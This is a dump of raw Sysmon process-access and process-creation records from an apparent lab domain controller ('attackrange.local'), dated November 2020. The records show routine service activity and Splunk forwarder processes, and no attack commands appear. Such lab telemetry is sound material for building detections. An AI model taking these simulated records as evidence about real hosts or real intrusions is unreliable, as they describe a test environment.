15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4601-000000008801}2472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4601-000000008801}2472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.040{D28789B6-7CE2-5FA1-4601-000000008801}2472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE3-5FA1-5401-000000008801}3376C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE3-5FA1-5401-000000008801}3376C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.571{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE3-5FA1-5401-000000008801}3376C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.026{D28789B6-7CE3-5FA1-5401-000000008801}3376C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.305{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE3-5FA1-5701-000000008801}3148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 